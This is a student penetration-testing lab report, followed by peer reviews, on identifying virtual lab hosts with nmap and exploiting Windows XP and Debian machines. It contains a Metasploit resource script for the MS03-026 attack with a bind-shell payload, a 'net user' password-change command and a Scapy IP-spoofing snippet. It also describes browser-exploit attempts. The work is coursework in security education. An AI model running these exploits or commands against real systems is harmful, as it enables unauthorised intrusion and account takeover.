Abstract
In this week's lab we will analyze target hosts and choose exploit tools that will exploit them in as few attempts as possible. Because we're disclosing the number of attempts taken, we will place additional emphasis on the tool selection process to keep the number of attempts low. In a real attack or penetration test, this would have the added benefit of reducing the amount of interaction with the host and the chance of disclosing our attempts.
After testing the exploits, we will analyze our attempts, review our successes and failures, and consider what they mean in the broader scope of penetration testing. We will review the methods used and identify biases that may exist in current penetration testing techniques and exploit tools.
Literature Review
Over the past five lab exercises, we've compiled multiple tables based on various topics related to penetration testing. In the first lab we compiled a table of exploit tools and organized them according to the OSI layer they exploited. Once we identified tools to exploit each of the OSI layers, we needed ways to discover which layers were exploitable. In labs two and three we developed more lists of tools, again organized by OSI layer, allowing us to pick and choose which layers of a system we wanted to monitor and how we wanted to monitor them. Once a vulnerability has been discovered through reconnaissance, a tester needs to research the vulnerability using tools available to them, such as online vulnerability databases and vendor security configuration guides. Research will lead to a better understanding of the vulnerability and allow the tester to pick the appropriate tool to exploit the network without causing any unnecessary network traffic that could reveal their efforts. Lab six focuses on selecting the proper tool for exploiting the target system the first time, based on information gathered from the target system using methods developed in previous labs.
The bulk of the readings for lab six focus on the topic of vulnerability identification and exploitation using processes or methodologies. In (Mirkovic & Reiher, 2004) the authors create a highly detailed Distributed Denial of Service (DDoS) taxonomy. Their approach is to review known DDoS attack mechanisms and analyze how they were perpetrated and why. By analyzing known successful attacks, the authors can then look at the methods that were used to successfully or unsuccessfully defend against them. The authors identify an attack path used for DDoS propagation that will be similar to the one utilized in this lab. Through various scanning methods that the authors discuss (pp. 41-43), someone wishing to conduct a DDoS attack first gathers intelligence on the hosts that they can exploit. The primary methods involve vulnerability scans through active reconnaissance, something we researched in lab two. The authors do mention the possibility of spreading a worm through indirect communications channels such as Internet Relay Chat (IRC) but do not elaborate on the benefits of this approach. The DDoS taxonomy is echoed by J.P. McDermott where, through the use of attack nets, we can model the DDoS attack process as seen in (McDermott, 2000, p. 19). McDermott shows how penetration testers can use attack nets to brainstorm about methods of exploiting their target systems instead of just relying on flaws or vulnerabilities. A similar approach will be considered in the lab exercises though, since the systems do not physically exist, we can only hypothesize how they could be compromised using methods other than vulnerability exploitation. A way of using the DDoS model of vulnerability discovery is seen again in (Chen, Yang, & Lan, 2007), except this time it is used for defensive purposes. One major flaw that is not discussed in their model is the security of the communication between the controller and the agent. If this traffic is not encrypted, it could be subject to monitoring by other parties and used for attack coordination.
Since the attacks in this lab will be tested over a network, we'll need to employ network topology analysis, similar to what is discussed in (Zakeri, Shahriari, Jalili, & Sadoddin, 2005), to analyze our targets properly. While the subnet in our virtual lab environments is flat, the principles discussed by Zakeri et al. are still highly relevant to our lab. They identify a model for vulnerability analysis of network hosts including operating system (OS), OS version, OS configuration, service information, service version, and many others (pp. 2-3). (Haeni, 1997) presents methods for performing discovery against a firewall. Since firewalls are nothing more than specialized computers, and since one of our target hosts is an operating system running a firewall, the methods described in his paper will be useful in the lab. Haeni discusses methods for identifying open ports on a firewall and for perpetrating attacks behind the firewall (pp. 19-20). It's interesting to note that even though the paper was written over twelve years ago, many of the same methods are still valid against modern firewalls. This more than likely points both to insecurities in the TCP/IP protocol stack and to a lack of security innovation on the part of the vendors. Even back in 1997, Haeni was criticizing firewall vendors for certifying their own products and declaring them "secure" (p. 7).
Once we've identified the operating system version we're attempting to exploit, choosing the proper tool to perform the exploit depends on many factors. If the attacker is attempting to obfuscate their actions, they may employ a root kit or password cracking tool to gain surreptitious, high-level access to the system. In (Kühnhauser, 2004), root kits are analyzed as methods of covering attacks. If an attacker can place a root kit on a system, they gain complete control over the system, including low-level system functions. By doing this they can alter system files, log entries, and network traffic to cover up their tracks (pp. 14-15). Another method of surreptitious entry to a system would be to crack the passwords of existing users, as described in (Snyder, 2006). While the focus of the paper is more on developing a system for teaching students how to run password cracking programs, Snyder briefly mentions the ethical issues of teaching students how to crack passwords (p. 13). Other than some steps on running John the Ripper, the paper isn't very useful as far as depth into the topic. Sentences such as "One should always make your password hard to crack" (p. 15) affirm this. Cracking passwords could be utilized for surreptitious entry into a system by impersonating a user, but only if using offline methods such as hash cracking. Brute forcing a website password would almost certainly tip off the system owner to suspicious activity and indicate a sloppy or unmotivated attacker.
Methodology
In order to test the full extent of the knowledge gained and tools discovered throughout this class, we opted to approach the lab six exercises as a simulated red teaming exercise between our group's two team members. One team member changed the IP addresses and passwords on three of the virtual machines in our lab environment: Windows XP SP0, Windows XP SP3, and Debian Etch. After that was completed, that team member shut down the virtual machines and notified the other team member that the work was completed. It was then up to the second team member to identify what the IP addresses were changed to, which IP address corresponded to which operating system version, and finally to exploit and gain access to the virtual machines.
Once all of the virtual machines were powered up, Backtrack was used, specifically nmap's ping scanning feature, to quickly identify which IP addresses in our /24 subnet were responding to pings. Once the addresses had been identified, the known addresses of other virtual machines on the network were discarded from the list of results. We then used nmap to individually scan each of the IP addresses using the "-A" option for operating system identification. The two Windows systems returned their operating system versions along with open ports. The identification of the two Windows systems was also aided by the fact that the machines' NetBIOS names were "XPSP0VM" and "XPSP3VM." The Debian machine was not able to be identified through nmap. Nmap reported that there were too many OS fingerprints that matched, so we were only able to identify it definitively through the process of elimination. While this method involved the use of active tools for identification of the systems, had the systems been in use, we could have monitored the network traffic for information on the host configurations. One of the best giveaways for host identification is the application layer traffic. Had these machines been actively used we could have used SMB and RPC traffic activity to identify the two Windows machines. Once identified, it would have been a process of elimination using active scanning methods to determine what operating system version was running. Another method of host identification would be browser traffic. While it could be spoofed, the User-Agent field, if captured in a network packet, would disclose the browser name and operating system version.
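A minimal sketch of the discovery steps described above, assuming nmap is installed on the attacking machine and a hypothetical 192.168.1.0/24 lab subnet (the actual addresses were withheld by the other team member, and ping-sweep output parsing varies between nmap versions):

```python
# Host discovery and fingerprinting sketch; the subnet, known addresses, and
# output parsing below are illustrative assumptions, not the lab's actual values.
import subprocess

LAB_SUBNET = "192.168.1.0/24"      # hypothetical /24 subnet
KNOWN_HOSTS = {"192.168.1.10"}     # addresses of our own VMs, discarded from results

def ping_sweep(subnet):
    """Run nmap's ping scan against the subnet and return the raw output."""
    return subprocess.run(["nmap", "-sP", subnet],
                          capture_output=True, text=True).stdout

def fingerprint(host):
    """Run nmap with -A (OS and service/version detection) against one host."""
    return subprocess.run(["nmap", "-A", host],
                          capture_output=True, text=True).stdout

if __name__ == "__main__":
    # Older nmap builds report live hosts as "Host x.x.x.x appears to be up."
    live = [line.split()[1] for line in ping_sweep(LAB_SUBNET).splitlines()
            if line.startswith("Host") and "up" in line]
    for host in live:
        if host not in KNOWN_HOSTS:
            print(fingerprint(host))
```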
Once each of the hosts had been identified, we began to test exploit tools against each of them. The first target was the Windows XP SP0 machine with the known MS03-026 RPC vulnerability, for which an exploit module is included by default with the Metasploit Framework and which the team has experience exploiting. We configured Metasploit to use the "windows/shell_bind_tcp" payload and executed the attack; it was successful on the first try. Once the remote command shell was active we simply changed the passwords for the "user" and "Administrator" accounts. The change was verified by logging in to the machine through VMware Workstation's console, though it could have been done through Remote Desktop as well.
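A sketch of how this first attack could be scripted as a Metasploit resource file follows; the target address and new password are placeholders, and the module path is written from memory, so it may differ between Metasploit versions:

```python
# Write a Metasploit resource script for the MS03-026 attack and launch it;
# assumes msfconsole is on the PATH of the Backtrack attack machine.
import subprocess
import tempfile

TARGET = "192.168.1.20"            # hypothetical address of the XP SP0 VM

RC = f"""use exploit/windows/dcerpc/ms03_026_dcom
set RHOST {TARGET}
set PAYLOAD windows/shell_bind_tcp
exploit
"""

with tempfile.NamedTemporaryFile("w", suffix=".rc", delete=False) as rc_file:
    rc_file.write(RC)
    rc_path = rc_file.name

# Once the bind shell is open, the account passwords were changed from that
# shell with commands of the form:  net user Administrator <new-password>
subprocess.run(["msfconsole", "-r", rc_path])
```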
For the Windows XP SP3 target, we first researched the date that Service Pack 3 was released. This gave us a baseline for future security vulnerabilities so we didn't pick any that would have been patched with the service pack. Metasploit contains a built-in module for exploiting the vulnerability described in MS08-067. We executed that module, choosing the "Automatic Targeting" option instead of picking our specific operating system version to see how the tool behaved. For a payload we again chose "windows/shell_bind_tcp." The tool correctly identified the host as Windows XP Service Pack 3 (English) but hung at "Triggering the vulnerability…" We attempted to test whether the exploit had worked anyway by opening a telnet session to port 4444, the port we had configured for Metasploit to open for us, but the port was not open. We tested three more times using different payloads: "generic/shell_reverse_tcp," "generic/shell_bind_tcp," and "windows/meterpreter/bind_tcp." We ran nmap against the system to see what ports were open. The only ports that nmap returned were 135, 139, and 445, which generally indicates that the Windows firewall is turned on and is only allowing file and print services. Finally, we ran a Nessus scan against the machine and it did not detect MS08-067, confirming remotely that the vulnerability had been patched. Next we attempted to exploit some Internet Explorer 7 vulnerabilities on the machine. Through reconnaissance of traffic from the machine it would be possible to determine the browser type in use; assuming we were remote and could not observe that traffic, Internet Explorer 7 would be a good possibility. We set up Metasploit on our attack machine to open a listener on port 8080 that would inject code exploiting MS09-002. We pointed the browser of the XP SP3 machine to our exploit server's IP address on port 8080. This could easily be targeted at the "real" user of the target machine through an e-mail or modified web page with a link to our exploit server. The exploit attempted the code injection but failed. Inspection of the XP SP3 machine revealed that Internet Explorer 8 was installed. While this inspection could have been done before we even attempted the exploit, we wanted to test the tool's behavior. After five hours of semi-blind testing we gave up.
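The check we performed with telnet can also be expressed as a short script; this sketch simply tests whether the bind-shell listener ever opened (the target address is a placeholder, and 4444 is the port we had configured for the payload):

```python
# Test whether the bind-shell port is reachable on the XP SP3 target.
import socket

TARGET, PORT = "192.168.1.21", 4444   # hypothetical target address and configured bind port

def port_open(host, port, timeout=3):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

print(f"{TARGET}:{PORT} open -> {port_open(TARGET, PORT)}")
```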
Our Debian machine revealed little information from any scans we ran against it, so we immediately ran a Nessus scan. The Nessus scan returned with no open ports or vulnerabilities. We examined the Debian machine and determined that it wasn't running any services and, since neither X Window nor GNOME was running, the system wouldn't be very useful to a user. In order to increase the attack surface we installed Apache and an SSH server using "apt-get." After installing both of those we ran an nmap scan against the system to verify that the ports were open and responding to remote requests. A Nessus scan against the system revealed that Apache had detailed server headers turned on. While this isn't exploitable by itself, if there were a vulnerability released for the specific version of Apache we were running, this could easily allow an attacker to identify our system as a potential target. Nessus revealed that the versions of Apache and SSH we were running did not have any remotely exploitable vulnerabilities. After two hours of attempting to create realistic vulnerabilities in the system we gave up.
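For reference, a sketch of the remote verification step run from the attacking machine after the services were installed on the Debian target (package names such as "apache2" and "openssh-server" are assumptions for a Debian Etch-era repository, and the IP address is a placeholder):

```python
# Confirm from the attacking machine that the newly installed services answer.
import subprocess

DEBIAN_TARGET = "192.168.1.22"     # hypothetical address of the Debian VM

# Scan only the two ports the new services should open: SSH (22) and HTTP (80).
scan = subprocess.run(["nmap", "-p", "22,80", DEBIAN_TARGET],
                      capture_output=True, text=True)
print(scan.stdout)
```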
Findings
Based on the lab exercises, we were able to identify a tool that successfully exploited our first system on the first try. The second system put our exploit tool identification skills to the test. While the system appeared to be vulnerable based on operating system version and open ports, further testing revealed that the system had been patched. This forced us to rethink our attack strategy, moving from known vulnerabilities with published exploit code to other means. Through social engineering, it would be possible to direct the user of a system to a malicious web server hosting exploit code that would inject into the browser and give us remote access. We attempted to do this using Metasploit and the MS09-002 vulnerability, but the exploit failed because, as we found out after the test, Internet Explorer 8 was installed on the machine. Our Debian target machine proved even more difficult, with no open ports. We attempted to create exploitable vulnerabilities by installing additional software but did not have any success.
All of the exploit tools we used exploited remote connection capabilities in the target systems. In most circumstances the attacker or penetration tester will be running their attacks across a network. As seen with the Windows XP SP3 machine, firewalls can make this more difficult. A firewall can block certain attacks but let other ones through. Even with the firewall enabled on our XP SP3 machine, had it not been patched, allowing file and print sharing through the firewall would have allowed us to exploit the MS08-067 vulnerability. Since most of the tools exploit remote systems anywhere from OSI layer three and up, the tools reflect this bias by heavily targeting exploits that can be run remotely. We believe this bias may leave attacks that could be run locally on a machine, by an insider or by someone who has gained physical access, out of many penetration testing reports.
Exploiting the lower layers of a system, for example by spoofing packets, reveals weaknesses in the TCP/IP and OSI models. By design, there is an implicit level of trust in the lower layers by the higher layers. The application layer doesn't necessarily care about TCP ports; it assumes that this is handled by the programs responsible for that layer. If a packet is spoofed at the IP level, the application level will assume that it came from a valid source because layers three through six passed it up the stack as they should have. The application does its job and passes the packet back down the stack. Mistrusting the lower layers would defeat the reason for having them in the first place, so a balance must be struck or the whole system falls apart. A risk analysis of a vulnerability should include a classification based on the OSI layer that the vulnerability impacts so systems administrators can identify the cascading failures in higher layers that could result from a successful exploitation of the vulnerability.
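As an illustration of this implicit trust (a sketch outside the scope of the lab itself, assuming Scapy is installed and the script is run with root privileges; the addresses are placeholders), nothing at layers three or four prevents a packet with a forged source address from being handed up the stack:

```python
# Craft and send a TCP SYN whose source IP is forged; the receiving host's
# lower layers pass it up the stack exactly as they would a legitimate packet.
from scapy.all import IP, TCP, send

spoofed = IP(src="192.168.1.99", dst="192.168.1.21") / TCP(dport=80, flags="S")
send(spoofed, verbose=False)
```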
Conclusion
This lab showed us how to analyze a remote host and choose exploit tools to attack that host. We learned through our testing that failure isn't always a bad thing; it just means that the attack method we chose has been accounted for and mitigated or patched. Instead of indicating that the host isn't exploitable, a failure simply narrows our focus even further. We saw through the literature that through reconnaissance and the development of attack plans, attack trees, or exploit taxonomies we can narrow the focus of our exploits with little to no interaction with the target hosts.
While remote exploitation may not always be possible, vulnerabilities still exist. It's only a matter of time before another one is found and exploit code is published. Our findings indicate that exploits at the lower layers of the OSI model lead to compromise of the higher layers of the system. Because of the way current systems are designed, this type of attack would be very difficult, if not impossible, to defend against.
Works Cited
Chen, S.-J., Yang, C.-H., & Lan, S.-W. (2007). A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test. Paper presented at the 2007 Symposium on Cryptography and Information Security.
Haeni, R. E. (1997). Firewall Penetration Testing. The George Washington University, Cyberspace Policy Institute.
Kühnhauser, W. E. (2004). Root Kits: an operating systems viewpoint. SIGOPS Operating Systems Review, 38(1), 12-23.
McDermott, J. P. (2000). Attack Net Penetration Testing. Paper presented at the Proceedings of the 2000 Workshop on New Security Paradigms.
Mirkovic, J., & Reiher, P. (2004). A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. SIGCOMM Computer Communications Review, 34(2), 39-53.
Snyder, R. (2006). Ethical hacking and password cracking: a pattern for individualized security exercises. Paper presented at the Proceedings of the 3rd annual conference on Information security curriculum development.
Zakeri, R., Shahriari, H. R., Jalili, R., & Sadoddin, R. (2005). Modeling TCP/IP Networks Topology for Network Vulnerability Analysis. Sharif University of Technology.
This group's abstract only gives a summary of what is involved in this lab. This abstract could have been expanded to include more on the purpose of this lab and how it is related to the rest of the course. In the literature review for this group, they start off by summarizing all the labs up to and including this lab and give an overview of the entire course. This whole section could have been summarized and placed in the abstract of this lab. This section did not pertain to any of the readings. The rest of the literature review examines how each of the articles fits into this lab and how they relate to each other. The group does a very good job at this in the literature review, but they do not review each article individually. Since the group does not review the articles individually, they do not discuss any methodologies of the papers or the research done by the writers. The group does expose some discrepancies in the articles and clarifies them. This group approached the lab with a different means than everyone else in the class. In the methodology the group describes that they set up this lab as a simulated red teaming exercise between the two members of the group. One of the members changed IP addresses and passwords and the other attempted to discover the IP addresses and associate them with operating systems. The team used a Windows XP SP0 system, a Windows XP SP3 system, and a Debian Etch system as their three test computers. They used a fourth machine with Backtrack installed on it as the attacking computer. In the methodology the group used Nmap to determine what the operating systems were. This goes against the rules of the lab exercise. The lab states that the gathering of information about the operating system needs to be done passively. The group does explain how this could have been done passively, though. Throughout the methodology the group does a very good job of explaining each step and how they configured each of the tools and exploits to get the results they needed. The group did include a lot of results in the methodology section of this paper. They could have just given the method that they were going to follow and then explained in the findings what happened when they attempted the different exploits. The findings section seemed to just rehash what was already said in the methodology section of this paper. The second part of the findings in this paper explains how a network can still be exploited through an enabled firewall if the systems behind it are not patched properly. Also noted was that most of the exploits out in the world are biased toward remote services. The last statement in this section talks about leaving out attacks that can be run locally on a machine by insiders or others who have gained physical access. This was after explaining that the tools have a bias toward remote exploits. These statements seem to contradict each other. How can a remote exploit be a local attack by a local user? Lastly, the group explains that higher layers in the OSI model have a trust in the lower layers. They say that this would mean that if an attack happens at a lower layer, the upper layers will not know about the attack and will be compromised. One question that I have, though, is what happens when you introduce encryption into the lower layers?
Team five begins their lab with an abstract that gives an overview of the steps that will be accomplished in the lab. Unlike previous abstracts, this one meets the requirements of the syllabus, including the two-paragraph length. The literature review that team five presents for lab six demonstrates a high level of cohesion between the articles as well as a high level of understanding of the topics presented. They also do a good job of relating the topics of the literature review to the exercise of the lab. Once team five is done with their literature review, they explain the methods they will use to complete the steps of the lab. They explain in their methods that in order to prepare for lab seven one team member changed IP information on the VMs and afterwards the other team member had to fingerprint the VMs in order to attack them. They start by performing a ping scan. While I see this as a needed step, it does violate the passive nature of the first few steps of the lab design document. A ping scan is generally a dead giveaway of an attack. Making use of the new version of Nmap was a very nice touch, and one that other teams did not take advantage of. The rest of their methods section detailed the majority of the steps they were going to follow. Some of the information they presented in the methods section, like most of the teams, did belong in the findings section. They list exploits actually attempted in the methods section, which in my opinion is not correct. However, I do enjoy the discussion around the varied nature of the exploits they attempted. In the findings section they explain that, like the other teams, they were only able to exploit the Windows XP SP0 machine; however, they did mention the actual exploits they attempted, including updated and current exploits that are part of the Metasploit framework. I do not see any discussion about the total number of exploits attempted before achieving success or failure. Again, like the other teams, they were only able to exploit the XP SP0 machine. Like team two, once they discovered that the Debian machine had no running daemons they did not just give up. While not directly listed in the lab design document, adding services to the Debian machine shows a very scholarly level of involvement in the outcome of their lab. This lends credence to their results. Even though there were obviously issues with their lab, there is no issues section to be found. This is a direct violation of the syllabus as per the lab report design. I do not totally agree with a "trust" model placed between the layers of the OSI model as it pertains to the implementation of the model in a computer system. The addition of the Windows firewall is a direct result of the no-trust nature of the layers of the OSI model, in my opinion. Even though the firewall is technically a layer seven application, it interacts as low as layer two of the OSI model. I agree with the conclusions presented by team five.
The team had a nice introduction in their literature review, nicely summing up the past labs and telling the audience how they have all added up to this lab experiment. Like other teams, this team had very long paragraphs in the literature review. Lab 6 by team 5 was the first lab report to make the entire report sound like one person. Was this because only one person wrote the lab report, using information from the other member, and rewrote it for cohesiveness? The approach of having one team member change IP addresses and then having the other perform a penetration test on the systems is unique. I like the approach that this team took; why are they the only ones to think about performing the lab this way? It seems like many teams did not bother to attack the Debian machines; is this because other teams do not know how to attack a non-Windows machine?
I think that this team had one of the most detailed methods sections of all the teams. It is nice to see that this team was able to admit that they could not compromise some of their systems, and eventually gave up. So there was no number of times it took to compromise the system, since they never did. Like other teams, this team realized the reason why it was difficult to compromise the system: no services are running and no users are using it. Basically it is a clean system. So to me, this means that adding functionality to a system makes it more vulnerable. I have to ask, where is the Issues section? Was it that this team had no issues, or that the team did not have time for the issues? The lack of an issues section is an issue, but where do you put that? What a catch-22. After seeing other teams have screenshots of their lab experiment, I would like to have seen some from this team. Screenshots can add to the ability to duplicate the lab that the team performed. Overall this is a good lab, but not one of the better labs that this team has written. I hope to see the findings from this lab help this team, and all teams, with the next lab experiment.
Team 5 begins their lab report by stating their objective: to exploit the target hosts in as few attempts as possible. They intended to do this by placing additional emphasis on the tool selection process. They state that the added benefit would be lowered interaction with the target host and therefore less chance of detection.
In the first paragraph of the literature review, Team 5 reviewed all of the labs that they had completed up to this point. They then stated that the focus of lab 6 is selecting the proper tool for exploitation on the first try. Although it appears to be the introductory paragraph for the literature review, it didn't introduce the literature review or tie it to the lab assignments.
They proceeded to review A Taxonomy of DDoS Attack and DDoS Defense Mechanisms (Mirkovic & Reiher, 2004). They related this article to lab 6 in the way that the authors studied previous attacks and current vulnerabilities to create a plan prior to conducting the attack. They also related the lab to Attack Net Penetration Testing (McDermott, 2000) by discussing how penetration testers can model the penetration using attack nets. They mentioned the article A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test (Chen, Yang, & Lan, 2007) and state that it uses the DDoS model; however, they don't explain how it fits this model. Perhaps they are comparing the handler-agent design of the DDoS with the distributed computing system described by Chen, Yang, & Lan. They do, however, make a good point concerning the communication within the Distributed Network Security Assessment tool. If the data transferred between the agent and controller within the distributed system is not encrypted, it may cause information leakage to someone who is passively sniffing on the network.
They discuss Modeling TCP/IP Networks Topology for Network Vulnerability Analysis (Zakeri, Shahriari, Jalili, & Sadoddin, 2005) and how it presents a model for vulnerability analysis. They point out that it could be beneficial in this lab by providing a technique for modeling the system to determine vulnerabilities. Likewise, they discussed Firewall Penetration Testing (Haeni, 1997) and how the methods described, such as attacking behind a firewall, will be beneficial in conducting lab 6.
In the methodology section, Team 5 stated that they intend to conduct lab 6 as a simulated red team exercise between the two members of Team 5. One team member changed the IP addresses and passwords of the target machines so that the other team member could attempt penetration. They began with nmap to discover the target systems. Team 5 makes a good point that if the machines had been in use they would have been able to identify them passively through network traffic. They successfully exploited the Windows XP SP0 machine using the MS03-026 exploit and the shell_bind_tcp payload. They planned their attack against the Windows XP SP3 VM by first determining the date that service pack 3 was released and finding vulnerabilities that were discovered since then. They were unsuccessful in compromising the system. Team 5 made a good point that had the system been in actual use, they may have been able to target the system by placing malicious code in a web page or email. Likewise they were unable to find any exploits against their Debian machine, even after installing an Apache and SSH server.
Team 5 makes a good point that the systems are overly secure due to the lack of applications that are running and the lack of human interaction within the target systems. Our own research has shown that many of the known vulnerabilities occur within the application layer of the OSI model, and many require human interaction on the target system.
Team 5's abstract was well written and set the stage for what they were going to do in lab 6. The team did a nice job with their introduction and wrote a cohesive literature review in that they tied their lit review back to previous labs. This was good because it shows an understanding that this course has been set up for each lab to build upon the previous lab. I thought the approach team 5 took, with one team member changing the IP addresses and passwords on three of the virtual machines and then notifying the other team member that the work was completed so that the second team member could identify what the IP addresses were changed to, was truly a team effort.
Team 5 had one of the most detailed methods sections of all the teams. Their findings section was very detailed as well and helped me to understand more about this topic. I didn't see an issues section, so I have to ask, were there any issues? Overall this is a good lab, well written and cohesive.
In the abstract section of the laboratory report, team five viewed the constraints of the assignment as successfully exploiting the designated targets in as few attempts as possible, thus making tool selection a crucial element in the success of such an objective.
In the literature review section of the laboratory report, team five was able to intertwine the different articles to create a cohesive explanation of denial of service (DoS) and penetration testing. The only problems I could find with the section were that the summaries of the articles were very brief and the articles were not always related to the laboratory assignment. Team five was able to relate the denial of service (DoS) article to the lab assignment by stating, "The authors identify an attack path used for DDoS propagation that will be similar to the one utilized in this lab." Team five also found that the password cracking article was of poor quality when they stated, "Other than some steps on running John the Ripper, the paper isn't very useful as far as depth into the topic."
In the methodology section, team five split their team in half: one group member changed the IP addresses and passwords of the Windows XP SP0, Windows XP SP3, and Debian Etch virtual machines. When the group stated, "After that was completed, that team member shut down the virtual machines and notified the other team member that the work was completed," I was somewhat unclear on this statement, for why would one shut down the virtual machines that the other team member would need to access? The group then used nmap to identify the operating systems on the virtual machines. Group five was able to exploit Windows XP Service Pack 0 with Metasploit just as all of the other teams did. Just like all of the other groups, team five was unable to exploit Windows XP Service Pack 3. The group also was unable to exploit Debian, even after Apache server was installed on it.
The findings section of group five's laboratory report showed that the group came to the realization that there are limits on the effectiveness of the tools that all of the groups have been so heavily reliant upon. Group five, just as some of the other groups including my own, has realized that some of the layer eight techniques are beginning to look pretty appealing now. Group five stated, "Through social engineering, it would be possible to direct the user of a system to a malicious web server hosting exploit code that would inject into the browser and give us remote access."
In the conclusion section, I had to agree with team five when they stated, "Instead of indicating that the host isn't exploitable, a failure simply narrows our focus even further." This reminds me of what was said by Thomas Edison when he said that he did not fail, he just found numerous ways not to make a light bulb. The group also concluded that lower layer attacks would be harder to defend against.
I thought overall this team's report to be quite excellent. The literature review was clearly superior, in my opinion. The methodology was well described, displaying considerations with substantial thought underlying them. I was especially impressed by the experimental design, which used members of the group in a 'blind test' setup. I think this indicates a high degree of cohesion and cooperation among the team members: this is something other teams should seek to emulate.
Despite the overall excellent nature of the write-up, a few omissions and oversights appear to be present. Foremost, while I cannot criticize the ‘blind user’ setup, as it appeared to be well conceived, I do wonder if the methods used for the first two hosts were really an attempt at ‘passive’ reconnaissance. Despite having the advantage of user generated traffic by which to fingerprint hosts, this team resorted to using ‘nmap’ to actively interrogate the targets. This seemed totally unnecessary, as simple sniffing tools would have produced equally useful results. It was not mentioned if ‘nmap’ was run at a slow scan rate; if it was, I would likely consider this ‘passive enough’ and withdraw my criticism: this should have been discussed in the methodology in any case.
I thought it interesting that the team mentioned identifying the browser type by traffic. I would suggest that this is probably a method prone to error if HTTP headers are being used for identification. It is well known that many browsers 'lie' with regard to this; in fact many allow the user to set the browser ID string to any number of commonly used configurations (such as Opera, Firefox via plug-ins, and I believe Konqueror also). If HTML injection is being done, it might be better to utilize Javascript or CSS processing behavior characteristics (a common technique in web design) to determine browser type: this is usually quite accurate. This is just a suggestion, and not really a criticism: I found this team's research to be quite interesting with regard to this topic.
Furthermore, I do question the wisdom of tampering with a test system once the experiment has begun. Installing Apache on the Linux machine seemed a somewhat controversial choice. To be 'fair,' why not install Apache on Windows XP SP3 also, as it is cross-platform? It just appears that the 'baseline' of functionality was not maintained across machine types. Additionally, why not attempt to browse the web from the Linux machine via a text-based browser, or install an X server and graphical browser so that similar exploits can be attempted across machine types? These are really just suggestions: such steps would necessarily require a fair amount of additional time to complete, which may not have been realistic in the test situation.
Finally, I note that while the discussion of the OSI layer compromise situation and the exploit/tool biases was relatively thorough, I did not see the team address the question regarding the merit of Nessus versus passive means as discovered in the exercise. Furthermore, I believe that some factors are missing from the OSI layer exploit discussion. As the team asserts that there is 'implicit trust' among layers: what are the implications of good encryption techniques, whereby trust becomes explicit and reliable?
I think that group 5's write-up for lab 6 was fair. The abstract for this lab was good and provided a good overview of the lab. The literature review was very good in terms of summarizing the readings. Group 5 chose to write the literature review as one big comprehensive review, which is good; however, most of the required questions were not answered. It seemed as if the literature review was nothing more than a summary of the required readings and did not include any speculation about the research methodology or any errors or omissions, though they did indicate how it relates to the laboratory. All of the citing for the literature review was done well and all of the pages were included. For this lab, the group answered all of the required questions and provided a good amount of detail about the steps they performed to attack the target systems. However, there are some errors with the way the lab was performed. It appears that they did NOT use passive methods of OS detection, nor did they report the correct information about their active OS detection. The group used nmap instead of a passive scanner such as Ettercap or P0f. They also indicated that the -A argument was used to detect the OSes when nmap uses the -O argument. This makes me wonder if they read the instructions correctly. However, their observation that TCP/IP is easier to exploit than the actual computer is a good idea. This is very true, as TCP/IP attacks can work against fully patched systems. The conclusion was well written and accurately summarizes what was covered. Overall, most of the required questions were answered and answered well; however, in the lab there seemed to be a little confusion about how to perform passive scanning.
This team, like team 1, chose Windows XP SP0, SP3, and Debian Etch. Unlike group one, this team changed the IP addresses in an attempt to mask the target clients from the other group member who was doing the testing. This reflects a different approach that some attackers take. They may not know what they are targeting and must find out information such as the targets' IP addresses. This group used nmap to scan the network and locate the target clients. Nmap discovered the clients but, similar to other scan tools used by other groups, identifying the operating systems is an educated guess. The Windows XP SP0 machine was easily identified, while the Debian and XP SP3 systems were given false or too many matches for an OS fingerprint. This team did something different to exploit the Windows XP SP3 system. They launched a web browser and pointed it to their web server, which attempted to exploit the machine. Would the same result have happened if the web browser was different, say Mozilla Firefox with the NoScript add-on? This type of attack can be difficult to use against users the attacker is unfamiliar with; specifically targeting an unknown node with this attack would be difficult. The Debian system was also approached differently: they used "apt-get" to install Apache and SSH. They soon discovered that this did not help, and they were unable to exploit the system.
Team five’s report is well done and accurately describes what took place in the lab. The only place where it runs a bit thin is in the methods section.
Team five’s abstract is a quick overview of the lab. It could use more detail. What exactly are you doing to choose tools? What are the general steps in the process?
The literature review is well developed and relates the articles back to the lab as well as the class. It provides in-depth evaluative content. The articles are summarized so that the reader knows what they discuss, without trying to convey too much information.
The Methods section could be more detailed in order to provide a repeatable process. Some of the data contained in this section belongs in your findings. I'm curious as to why you deviated from the assignment.
The group’s findings are complete and well reasoned. Do you think that improvements could be made to the lab environment in order to more accurately reflect a real-world scenario?
The group’s conclusion accurately reflects the lab, and gives a good explanation of what was learned. The report is missing an issues section. Did you have any issues?